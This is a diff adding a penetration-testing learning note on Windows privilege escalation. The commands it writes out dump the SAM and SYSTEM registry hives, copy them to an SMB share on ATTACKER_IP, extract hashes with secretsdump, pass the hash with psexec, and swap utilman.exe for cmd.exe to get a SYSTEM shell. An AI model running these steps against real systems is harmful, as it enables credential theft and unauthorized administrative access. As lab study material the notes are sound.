nischal-khadka/vapt-learning/notes/VAPT_Notes.md

 	 		> sc start SERVICE_NAME

 	 -> When we will look at our machine we will be at the highest privilege account of the Windows machine.

+## Abusing Dangerous Privileges:

+- Privileges are rights that an acoount can perform based on specific system-related tasks.
+We could even bypass some DACL-based access control because of some privileges given to low level user.

+  ### SeBackup/ SeRestore:

+  - The SeBackup and SeRestore privileges allow user to read and write to any file in the system by ignoring DACL in place.
+This privilege is given to some users to perform backups from a system without requiring full administrative privilege.
+Compromising such accounts could give an attacker power to escalate privileges on the system by using many techniques.
+One of which is copying the SAM and SYSTEM registry hives to extract the local Administrators password hash.

+  - We could check the privilege of the user by:

+    	> whoami /priv

+	- If we can see SeBackup and SeRestore privilege, then we can exploit this privilege to gain administrators password hash.
+The first step would be to backup the SAM and SYSTEM hashes.

+    		> reg save hklm\system C:\Users\Nischal\system.hive

+			> reg save hklm\sam C:\Users\Nischal\sam.hive

+	- This will create couple of files with the registry hives content.
+We can then copy these files to our attacking machine using SMB or other methods.
+For SMB, we could use impacket smbserver.py to host a simple SMB server with a network share of our attacking machine.

+    		$ mkdir share

+			$ python3 /path/to/the/smbserver.py -smb2support -username Nischal -password hello! public share

+	- This will create a share named public which points to the share diretory we created.
+Username and password are the credentials of the compromised windows target.
+Then, we can copy the registry hives content to transfer it to the attacking machine.

+    		> copy C:\Users\Nischal\sam.hive \\ATTACKER_IP\public\

+			> copy C:\Users\Nischal\system.hive \\ATTACKER_IP\public\

+	- Now, we can use impacket to retrieve the users password hashes.

+    		$ python3 /path/to/the/secretsdump.py -sam sam.hive -system system.hive LOCAL

+	- After getting the hash value of Administrator, we can perform Pass-the-Hash attack to gain access to the target machine with SYSTEM privileges.
+First copy the admins password hash value.

+    		$ python3 /path/to/the/psexex.py -hashes ADMIN_HASH administrator@TARGET_IP

+	- After this we will get a Windows cmd in our attacking machine and we will be at the highest level of privilege.

+ ### SeTakeOwnership:

+ - This Privilege allows a user to take ownership fo any object on the system which includes files and registry keys.
+This opens many possibilities for an attacker to elevate privileges.
+An example would be searching for a service running as SYSTEM and taking its ownership.

+ - The first step will be to run command promt as administrator and use the pasword of the current user to get the command line.

+   		> whoami /priv

+   - If we have a privilege named SETakeOwnershipPrivilege, then we can abuse utilman.exe to esacalte privileges.
+Utilman is a built-in Windows application used to provide ease of access options during the lock screen and it runs with SYSTEM privileges.

+   - So, to replace utilman, we will first take ownership of it.

+     		> takeown /f C:\Windows\System32\Utilman.exe

+	- It is important to note that being the file owner does not mean we have privileges over it, so we need to assign ourself the privilege we need.

+   			> icacls C:\Windows\System32\Utilman.exe /grant Nischal:F

+   	- After this we need to replace utilman.exe with a copy of cmd.exe.

+   	  		> copy cmd.exe utilman.exe

+	- Finally, to trigger utilman, we will need to lock our screen and click on "Ease of Access" button to run utilman.exe.
+Since, we replaced it with a copy of cmd.exe, we will get a command prompt with SYSTEM privileges.

+ - These are some of the privileges we can exploit but depending on the system, many more could be fould such as SEImpersonate/SeAssignPrimaryToken.

+## Abusing Vulnerable Software:

+- Software installed on the target machine could also potentially lead to many privilege escalation opportunites.
+Like operating system, users and organisations may not update drivers or software which attackers could exploit.
+To gather information on the installed software we can type the following command.

+  		> wmic product get name,version,vendor

+  - This command does not guarantee to return all installed program, so it is of best practice to check desktop shortcuts, available services or any trace that indicates the existence of additional software that is vulnerable.

+  - Once enumeration on the software has been done, we could check exploit-db or google to search for known exploits.

+  ## Tools:

+  - Several scripts are availabe to conduct system enumeration on Windows machine which could shorten the process time of enumeration itself and uncover different potential privilege escalation vectors.
+However, these automated enumeration could sometimes miss privilage escaltion vulnerabilites.

+  - Some of the common tools to identify privilege escalation vectors are:

+    - WinPEAS

+			> winpeas.exe > output.txt

+	- PrivescCheck

+    		> Set-ExecutionPolicy Bypass -Scope process -Force

+			> . .\PrivescCheck.ps1

+			> Invoke-PrivescCheck

+	 - WES-NG

+     		> wes.py systeminfo.txt (.txt file download from Windows)

+	 - Metasploit

+     	- If we already have a Meterpreter shell on the target system, we can use "multi/recon/local_exploit_suggester" module to list vulnerabilites on the target system which will help us to elevate privileges.